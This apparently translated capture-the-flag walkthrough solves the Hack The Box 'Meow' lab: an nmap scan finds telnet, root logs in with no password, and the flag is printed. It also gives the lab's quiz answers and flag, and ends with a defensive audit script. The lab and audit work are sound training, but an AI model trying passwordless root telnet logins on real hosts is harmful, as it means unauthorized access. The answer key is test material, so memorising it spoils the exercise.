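A note up front: although Tier 0 (Meow) is very simple, anyone who has never worked on this kind of challenge may feel lost at first, so every step of the solution is written out here for reference.
Kali Linux is the recommended penetration-testing platform. After registering an account on the Hackthebox site (https://hackthebox.com/), work through the following steps:
Step 1: Install openvpn on Kali Linux, which is straightforward: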
# apt install openvpn
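Step 2: Start the Tier 0 challenge on the Hackthebox site. Following the site's steps, connect first; before connecting you need to download the VPN configuration file.
After downloading the VPN configuration file, you can move it to the root directory.
Step 3: Connect with openvpn and the downloaded VPN configuration file. If no error is reported, the connection succeeded: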
#openvpn staring_point_jasonhuawen.ovpn
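(The configuration file name differs from account to account.)
Once connected, the Hackthebox site shows the connected status and gives the target's IP address (the part in green text). The user can restart or reset the target machine.
Step 4: Since it is not known which services the target runs, scan it with nmap. The scan result shows that the target runs only the telnet service (this is important).
Step 5: Return to the Hackthebox site and continue answering the questions, all of which are fairly simple:
Task 1: What does the acronym VM stand for?
Answer: virtual machine (submit the answer; if it is wrong, the site shows a hint)
Task 2: What tool do we use to interact with the operating system in order to start our VPN connection?
Answer: Terminal
Task 3: What service do we use to form our VPN connection?
Answer: Openvpn
Task 4: What is the abbreviated name for a tunnel interface in the output of your VPN boot-up sequence output?
Answer: tun (the answer can also be read from ifconfig or from the output openvpn prints while establishing the connection)
Task 5: What tool do we use to test our connection to the target?
Answer: Ping
Task 6: What is the name of the tool we use to scan the target's ports?
Answer: nmap (a superb scanning tool)
Task 7: What service do we identify on port 23/tcp during our scans?
Approach: scan the target with nmap to learn which ports are open and which services run on them.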
#nmap -sS 10.129.1.17
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 23:44 EDT
Nmap scan report for 10.129.1.17
Host is up (0.19s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
23/tcp open  telnet
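Answer: Telnet
Task 8: What username ultimately works with the remote management login prompt for the target?
Approach: since the target runs only one service, telnet, simply try it. It turns out that root can log in without even being asked for a password: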
└─# telnet 10.129.1.17
Trying 10.129.1.17...
Connected to 10.129.1.17.
Escape character is '^]'.
ls^M

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 30 Mar 2022 03:58:49 AM UTC

  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             136
  Users logged in:       0
  IPv4 address for eth0: 10.129.1.17
  IPv6 address for eth0: dead:beef::250:56ff:feb9:4ed

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
Submit root flag
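Since this is only Tier 0, it is quite simple: after logging in over telnet, ls lists the files in the directory and flag.txt is right there, so no tedious searching is needed.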
root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
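
Seen from the defender's side, the walkthrough rests on two findings: telnet exposed on 23/tcp and a root account that logs in without a password. The shell script below is an added example, not part of the original write-up, that checks for both; the function names and the sample nmap and shadow data are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: audit helpers for the two weaknesses seen on Meow.
# All sample data below is constructed for the demonstration.

# Constructed nmap output in the same format as the scan on this page.
SAMPLE_NMAP='Nmap scan report for 10.129.1.17
Host is up (0.19s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
23/tcp open  telnet'

# Constructed /etc/shadow-style lines (user:password-field:...).
# An empty second field means the account has no password set.
SAMPLE_SHADOW='root::18785:0:99999:7:::
daemon:*:18659:0:99999:7:::
svc:!:18659:0:99999:7:::
alice:$6$constructedsalt$constructedhash:18785:0:99999:7:::'

# Read nmap normal output on stdin; print "host port service" for every
# open cleartext remote-login service (telnet and the r-services).
find_cleartext_services() {
    awk '
        /^Nmap scan report for / { host = $NF; gsub(/[()]/, "", host) }
        $2 == "open" && $1 ~ /\/tcp$/ && $3 ~ /^(telnet|login|shell|exec)$/ {
            split($1, p, "/"); print host, p[1], $3
        }'
}

# Read shadow-format lines on stdin; print accounts with an empty
# password field ("*" and "!" mean locked, so they are not reported).
find_empty_passwords() {
    awk -F: 'NF >= 2 && $2 == "" { print $1 }'
}

main() {
    echo "Cleartext remote-login services:"
    printf '%s\n' "$SAMPLE_NMAP" | find_cleartext_services
    echo "Accounts with an empty password field:"
    printf '%s\n' "$SAMPLE_SHADOW" | find_empty_passwords
}
main
```

On a real host, run `find_empty_passwords < /etc/shadow` as root and feed `find_cleartext_services` the saved output of a scan of your own address range.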